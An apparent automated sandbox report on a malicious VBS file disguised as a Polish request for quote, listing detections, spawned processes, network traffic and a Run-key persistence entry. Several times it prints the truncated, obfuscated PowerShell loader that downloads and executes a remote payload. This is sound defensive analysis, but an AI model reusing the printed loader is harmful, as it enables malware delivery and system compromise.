Source: powershell.exe, 00000010.00000002.3176265994.0000016B68565000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2912764832.00000000056CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2912764832.000000000558E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000010.00000002.3021739315.0000016B589C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A30C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A308000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A2E6000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000016.00000003.2884545435.00000000072DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000010.00000002.3021739315.0000016B589C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A30C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A308000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A2E6000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000016.00000003.2884545435.00000000072DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000010.00000002.3021739315.0000016B589C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A30C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A308000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A2E6000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000016.00000003.2884545435.00000000072DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000010.00000002.3021739315.0000016B589C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A30C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A308000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A2E6000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000016.00000003.2884545435.00000000072DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000010.00000002.3021739315.0000016B589C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A30C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A308000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3021739315.0000016B5A2E6000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000016.00000003.2884545435.00000000072DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706

Source: unknown	HTTPS traffic detected: 142.250.185.174:443 -> 192.168.2.7:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.74.193:443 -> 192.168.2.7:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.174:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.74.193:443 -> 192.168.2.7:49709 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi32_7004.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4704, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7004, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 5228
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 5228
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 5228	Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe';If (${host}.CurrentCulture) {$suballocating++;}Function Stemmetllerens($Tegningsfil){$Gearskifter=$Tegningsfil.Length-$suballocating;$Cordaitaleannitielt96='SUBsTRI';$Cordaitaleannitielt96+='ng';For( $Cordaitalean=2;$Cordaitalean -lt $Gearskifter;$Cordaitalean+=3){$Kalyptras+=$Tegningsfil.$Cordaitaleannitielt96.Invoke( $Cordaitalean, $suballocating);}$Kalyptras;}function Pharmacist($Unmicaceous){ & ($Breakneck) ($Unmicaceous);}$Banjernes=Stemmetllerens 'ThMFaoUnzMii ClMulHeas / a5Fi.,a0 C la(suWS.iAgnPaddio ,w TsPa ,eNHoTJ Op1Su0H,.A,0.w;Go KWPii BnAl6 B4,n;Co ,yx,e6 E4E.;Ds Tir Gv a: A1Ca2S,1.i.Ar0Mu) R S,GLieGicSpk AoR /I,2 S0P 1Ek0Ti0.n1Az0Sk1,e GrFUril rreeJ f EoDaxT /Sa1An2Fa1 .Pa0 l ';$Forgelser=Stemmetllerens 'PoU HsK,eElrPl- TAGeg,leHvnO.t H ';$Spytslikkeren=Stemmetllerens 'AuhMatWat Op,us W:Ko/Bi/Bedt.rNyi ,vDoePr.SugEpoBeo PgMilSle D.,hc WoM mPr/.au Pc B? neL.x epNooB.r BtPh=Dod.koShwSen,alBeo Da Sd a&A,ia,d u=D 1.alUnB ._UbMBypSkg ,j -,iWSuW.ye RK,eK XAaPLoO .EGrBubmOuL .yN.iBrKba3,rMS SSwcW OD,b ,2P.ySvdPe ';$Misevaluate=Stemmetllerens 'Ar> P ';$Breakneck=Stemmetllerens ',niVieTux.o ';$Hardbeam='dokumentnavne';$Wienerbrdsstang = Stemmetllerens 'ale FcM,hEuo K .a%Isa ap TpEfdPraFotJoaVa%Sy\SqV eeA iMen.alGee asHosT..OmD SiY,s G Jo&Sp&Gi PneBucSthKaoDd S t , ';Pharmacist (Stemmetllerens ' $ CgOblProFob SaUflMa:C.U dEusAmkR,rBoiArfBit FsTys bi .dTne Urs n e sUn= P(UncStmFodKl .k/,ecKo Gr$,hW Si .eSknB,eNorBlb BrUnd AsExs rt .aF.nS gF.)U. ');Pharmacist (Stemmetllerens 'Ch$ egz lF oTub.laMal,a:ShPS.oGarPasNoeThsP n FamopRes,s=,a$,nSNopheyG tEus.ulStiVrk .k neH rToeA.nRa. SsT.pUnlHyiShtKu(Fo$DiMDeiD,sPae evSba RlStu PaI t eSl) n ');Pharmacist (Stemmetllerens 'Ta[HoN ,e.otPr. SHiererL.vOvi,ocmiep,P IoFliRen mtViM .aLenTraN,g Fe SrV,]Wa:Ma:ErS Le Dc Du rn.iS,tLoy FPcar,aoKet.oo ,c AoUnlC. S =Ae P,[EgNFoe .t ..FoS ,e,ncStu or Pi,ntSty,iPTrrSuo ftEnoUncBeo.plPiT iy Bpraepr]U :Fr: TT,alAesSl1 B2 w ');$Spytslikkeren=$Porsesnaps[0];$Landbrugsbygningen= (Stemmetllerens 'Ho$ragStl,uoP.bH aS l ,: HbLaa .dT.eSmhUnt Pt ,e urWanRfe as.e=PrNSoeSuwSi-VrORebArja.eBacUdtVa K.SovyRus FtA,eAemK..VeN ,e ,tCy.C,WBeeBlbSuC,nlFeiS,eFln rt');$Landbrugsbygningen+=$Udskriftssidernes[1];Pharmacist ($Landbrugsbygn

Abnormal high CPU Usage

Source: C:\Windows\System32\wscript.exe

Process Stats: CPU usage > 49%

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_00007FFAAC22B4F6	16_2_00007FFAAC22B4F6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_00007FFAAC22C2A2	16_2_00007FFAAC22C2A2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_027FF1F0	20_2_027FF1F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_027FFAC0	20_2_027FFAC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 22_2_0323D238	22_2_0323D238
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 22_2_03234AA8	22_2_03234AA8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 22_2_03233E90	22_2_03233E90
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 22_2_03239EF8	22_2_03239EF8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 22_2_032341D8	22_2_032341D8
Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe	Code function: 24_2_00161C5C	24_2_00161C5C
Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe	Code function: 24_2_001625D3	24_2_001625D3

Java / VBScript file with very long strings (likely obfuscated code)

Source: Zapytanie ofertowe (GASTRON 07022024).vbs

Initial sample: Strings found which are bigger than 50

Yara signature match

Source: amsi32_7004.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4704, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7004, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winVBS@14/10@3/3

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Veinless.Dis

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1832:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=4704
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7004
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Zapytanie ofertowe (GASTRON 07022024).vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe';If (${host}.CurrentCulture) {$suballocating++;}Function Stemmetllerens($Tegningsfil){$Gearskifter=$Tegningsfil.Length-$suballocating;$Cordaitaleannitielt96='SUBsTRI';$Cordaitaleannitielt96+='ng';For( $Cordaitalean=2;$Cordaitalean -lt $Gearskifter;$Cordaitalean+=3){$Kalyptras+=$Tegningsfil.$Cordaitaleannitielt96.Invoke( $Cordaitalean, $suballocating);}$Kalyptras;}function Pharmacist($Unmicaceous){ & ($Breakneck) ($Unmicaceous);}$Banjernes=Stemmetllerens 'ThMFaoUnzMii ClMulHeas / a5Fi.,a0 C la(suWS.iAgnPaddio ,w TsPa ,eNHoTJ Op1Su0H,.A,0.w;Go KWPii BnAl6 B4,n;Co ,yx,e6 E4E.;Ds Tir Gv a: A1Ca2S,1.i.Ar0Mu) R S,GLieGicSpk AoR /I,2 S0P 1Ek0Ti0.n1Az0Sk1,e GrFUril rreeJ f EoDaxT /Sa1An2Fa1 .Pa0 l ';$Forgelser=Stemmetllerens 'PoU HsK,eElrPl- TAGeg,leHvnO.t H ';$Spytslikkeren=Stemmetllerens 'AuhMatWat Op,us W:Ko/Bi/Bedt.rNyi ,vDoePr.SugEpoBeo PgMilSle D.,hc WoM mPr/.au Pc B? neL.x epNooB.r BtPh=Dod.koShwSen,alBeo Da Sd a&A,ia,d u=D 1.alUnB ._UbMBypSkg ,j -,iWSuW.ye RK,eK XAaPLoO .EGrBubmOuL .yN.iBrKba3,rMS SSwcW OD,b ,2P.ySvdPe ';$Misevaluate=Stemmetllerens 'Ar> P ';$Breakneck=Stemmetllerens ',niVieTux.o ';$Hardbeam='dokumentnavne';$Wienerbrdsstang = Stemmetllerens 'ale FcM,hEuo K .a%Isa ap TpEfdPraFotJoaVa%Sy\SqV eeA iMen.alGee asHosT..OmD SiY,s G Jo&Sp&Gi PneBucSthKaoDd S t , ';Pharmacist (Stemmetllerens ' $ CgOblProFob SaUflMa:C.U dEusAmkR,rBoiArfBit FsTys bi .dTne Urs n e sUn= P(UncStmFodKl .k/,ecKo Gr$,hW Si .eSknB,eNorBlb BrUnd AsExs rt .aF.nS gF.)U. ');Pharmacist (Stemmetllerens 'Ch$ egz lF oTub.laMal,a:ShPS.oGarPasNoeThsP n FamopRes,s=,a$,nSNopheyG tEus.ulStiVrk .k neH rToeA.nRa. SsT.pUnlHyiShtKu(Fo$DiMDeiD,sPae evSba RlStu PaI t eSl) n ');Pharmacist (Stemmetllerens 'Ta[HoN ,e.otPr. SHiererL.vOvi,ocmiep,P IoFliRen mtViM .aLenTraN,g Fe SrV,]Wa:Ma:ErS Le Dc Du rn.iS,tLoy FPcar,aoKet.oo ,c AoUnlC. S =Ae P,[EgNFoe .t ..FoS ,e,ncStu or Pi,ntSty,iPTrrSuo ftEnoUncBeo.plPiT iy Bpraepr]U :Fr: TT,alAesSl1 B2 w ');$Spytslikkeren=$Porsesnaps[0];$Landbrugsbygningen= (Stemmetllerens 'Ho$ragStl,uoP.bH aS l ,: HbLaa .dT.eSmhUnt Pt ,e urWanRfe as.e=PrNSoeSuwSi-VrORebArja.eBacUdtVa K.SovyRus FtA,eAemK..VeN ,e ,tCy.C,WBeeBlbSuC,nlFeiS,eFln rt');$Landbrugsbygningen+=$Udskriftssidernes[1];Pharmacist ($Landbrugsbygn
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Veinless.Dis && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe';If (${host}.CurrentCulture) {$suballocating++;}Function Stemmetllerens($Tegningsfil){$Gearskifter=$Tegningsfil.Length-$suballocating;$Cordaitaleannitielt96='SUBsTRI';$Cordaitaleannitielt96+='ng';For( $Cordaitalean=2;$Cordaitalean -lt $Gearskifter;$Cordaitalean+=3){$Kalyptras+=$Tegningsfil.$Cordaitaleannitielt96.Invoke( $Cordaitalean, $suballocating);}$Kalyptras;}function Pharmacist($Unmicaceous){ & ($Breakneck) ($Unmicaceous);}$Banjernes=Stemmetllerens 'ThMFaoUnzMii ClMulHeas / a5Fi.,a0 C la(suWS.iAgnPaddio ,w TsPa ,eNHoTJ Op1Su0H,.A,0.w;Go KWPii BnAl6 B4,n;Co ,yx,e6 E4E.;Ds Tir Gv a: A1Ca2S,1.i.Ar0Mu) R S,GLieGicSpk AoR /I,2 S0P 1Ek0Ti0.n1Az0Sk1,e GrFUril rreeJ f EoDaxT /Sa1An2Fa1 .Pa0 l ';$Forgelser=Stemmetllerens 'PoU HsK,eElrPl- TAGeg,leHvnO.t H ';$Spytslikkeren=Stemmetllerens 'AuhMatWat Op,us W:Ko/Bi/Bedt.rNyi ,vDoePr.SugEpoBeo PgMilSle D.,hc WoM mPr/.au Pc B? neL.x epNooB.r BtPh=Dod.koShwSen,alBeo Da Sd a&A,ia,d u=D 1.alUnB ._UbMBypSkg ,j -,iWSuW.ye RK,eK XAaPLoO .EGrBubmOuL .yN.iBrKba3,rMS SSwcW OD,b ,2P.ySvdPe ';$Misevaluate=Stemmetllerens 'Ar> P ';$Breakneck=Stemmetllerens ',niVieTux.o ';$Hardbeam='dokumentnavne';$Wienerbrdsstang = Stemmetllerens 'ale FcM,hEuo K .a%Isa ap TpEfdPraFotJoaVa%Sy\SqV eeA iMen.alGee asHosT..OmD SiY,s G Jo&Sp&Gi PneBucSthKaoDd S t , ';Pharmacist (Stemmetllerens ' $ CgOblProFob SaUflMa:C.U dEusAmkR,rBoiArfBit FsTys bi .dTne Urs n e sUn= P(UncStmFodKl .k/,ecKo Gr$,hW Si .eSknB,eNorBlb BrUnd AsExs rt .aF.nS gF.)U. ');Pharmacist (Stemmetllerens 'Ch$ egz lF oTub.laMal,a:ShPS.oGarPasNoeThsP n FamopRes,s=,a$,nSNopheyG tEus.ulStiVrk .k neH rToeA.nRa. SsT.pUnlHyiShtKu(Fo$DiMDeiD,sPae evSba RlStu PaI t eSl) n ');Pharmacist (Stemmetllerens 'Ta[HoN ,e.otPr. SHiererL.vOvi,ocmiep,P IoFliRen mtViM .aLenTraN,g Fe SrV,]Wa:Ma:ErS Le Dc Du rn.iS,tLoy FPcar,aoKet.oo ,c AoUnlC. S =Ae P,[EgNFoe .t ..FoS ,e,ncStu or Pi,ntSty,iPTrrSuo ftEnoUncBeo.plPiT iy Bpraepr]U :Fr: TT,alAesSl1 B2 w ');$Spytslikkeren=$Porsesnaps[0];$Landbrugsbygningen= (Stemmetllerens 'Ho$ragStl,uoP.bH aS l ,: HbLaa .dT.eSmhUnt Pt ,e urWanRfe as.e=PrNSoeSuwSi-VrORebArja.eBacUdtVa K.SovyRus FtA,eAemK..VeN ,e ,tCy.C,WBeeBlbSuC,nlFeiS,eFln rt');$Landbrugsbygningen+=$Udskriftssidernes[1];Pharmacist ($Landbrugsbygn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Veinless.Dis && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe "C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe"
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe "C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Veinless.Dis && echo t"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe';If (${host}.CurrentCulture) {$suballocating++;}Function Stemmetllerens($Tegningsfil){$Gearskifter=$Tegningsfil.Length-$suballocating;$Cordaitaleannitielt96='SUBsTRI';$Cordaitaleannitielt96+='ng';For( $Cordaitalean=2;$Cordaitalean -lt $Gearskifter;$Cordaitalean+=3){$Kalyptras+=$Tegningsfil.$Cordaitaleannitielt96.Invoke( $Cordaitalean, $suballocating);}$Kalyptras;}function Pharmacist($Unmicaceous){ & ($Breakneck) ($Unmicaceous);}$Banjernes=Stemmetllerens 'ThMFaoUnzMii ClMulHeas / a5Fi.,a0 C la(suWS.iAgnPaddio ,w TsPa ,eNHoTJ Op1Su0H,.A,0.w;Go KWPii BnAl6 B4,n;Co ,yx,e6 E4E.;Ds Tir Gv a: A1Ca2S,1.i.Ar0Mu) R S,GLieGicSpk AoR /I,2 S0P 1Ek0Ti0.n1Az0Sk1,e GrFUril rreeJ f EoDaxT /Sa1An2Fa1 .Pa0 l ';$Forgelser=Stemmetllerens 'PoU HsK,eElrPl- TAGeg,leHvnO.t H ';$Spytslikkeren=Stemmetllerens 'AuhMatWat Op,us W:Ko/Bi/Bedt.rNyi ,vDoePr.SugEpoBeo PgMilSle D.,hc WoM mPr/.au Pc B? neL.x epNooB.r BtPh=Dod.koShwSen,alBeo Da Sd a&A,ia,d u=D 1.alUnB ._UbMBypSkg ,j -,iWSuW.ye RK,eK XAaPLoO .EGrBubmOuL .yN.iBrKba3,rMS SSwcW OD,b ,2P.ySvdPe ';$Misevaluate=Stemmetllerens 'Ar> P ';$Breakneck=Stemmetllerens ',niVieTux.o ';$Hardbeam='dokumentnavne';$Wienerbrdsstang = Stemmetllerens 'ale FcM,hEuo K .a%Isa ap TpEfdPraFotJoaVa%Sy\SqV eeA iMen.alGee asHosT..OmD SiY,s G Jo&Sp&Gi PneBucSthKaoDd S t , ';Pharmacist (Stemmetllerens ' $ CgOblProFob SaUflMa:C.U dEusAmkR,rBoiArfBit FsTys bi .dTne Urs n e sUn= P(UncStmFodKl .k/,ecKo Gr$,hW Si .eSknB,eNorBlb BrUnd AsExs rt .aF.nS gF.)U. ');Pharmacist (Stemmetllerens 'Ch$ egz lF oTub.laMal,a:ShPS.oGarPasNoeThsP n FamopRes,s=,a$,nSNopheyG tEus.ulStiVrk .k neH rToeA.nRa. SsT.pUnlHyiShtKu(Fo$DiMDeiD,sPae evSba RlStu PaI t eSl) n ');Pharmacist (Stemmetllerens 'Ta[HoN ,e.otPr. SHiererL.vOvi,ocmiep,P IoFliRen mtViM .aLenTraN,g Fe SrV,]Wa:Ma:ErS Le Dc Du rn.iS,tLoy FPcar,aoKet.oo ,c AoUnlC. S =Ae P,[EgNFoe .t ..FoS ,e,ncStu or Pi,ntSty,iPTrrSuo ftEnoUncBeo.plPiT iy Bpraepr]U :Fr: TT,alAesSl1 B2 w ');$Spytslikkeren=$Porsesnaps[0];$Landbrugsbygningen= (Stemmetllerens 'Ho$ragStl,uoP.bH aS l ,: HbLaa .dT.eSmhUnt Pt ,e urWanRfe as.e=PrNSoeSuwSi-VrORebArja.eBacUdtVa K.SovyRus FtA,eAemK..VeN ,e ,tCy.C,WBeeBlbSuC,nlFeiS,eFln rt');$Landbrugsbygningen+=$Udskriftssidernes[1];Pharmacist ($Landbrugsbygn	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Veinless.Dis && echo t"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior

Source: Yara match	File source: 00000014.00000002.2919733703.00000000096F5000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2919321134.0000000008200000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2912764832.00000000056CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3176265994.0000016B68565000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Nynazistens)$global:Unobumbrated = [System.Text.Encoding]::ASCII.GetString($Myxomycete)$global:Vildtjagternes=$Unobumbrated.substring($Amebae,$Klokker)<#Prparat sbeboblens trichloret
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Ensidigheden $comoedus $Ded), (Societyet @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Multifidly = [AppDomain]::CurrentDomain.GetAssemblies()$global:Ren
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Snerydningen)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Skjaldedigtningerne, $false).DefineType($Sto
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Nynazistens)$global:Unobumbrated = [System.Text.Encoding]::ASCII.GetString($Myxomycete)$global:Vildtjagternes=$Unobumbrated.substring($Amebae,$Klokker)<#Prparat sbeboblens trichloret

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_00007FFAAC2F54D7 push ebp; iretd	16_2_00007FFAAC2F5538
Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe	Code function: 24_2_001613F8 pushfd ; retf	24_2_001613F9
Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe	Code function: 24_2_0016376D push ecx; ret	24_2_00163780

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fMNDB			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fMNDB			Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior
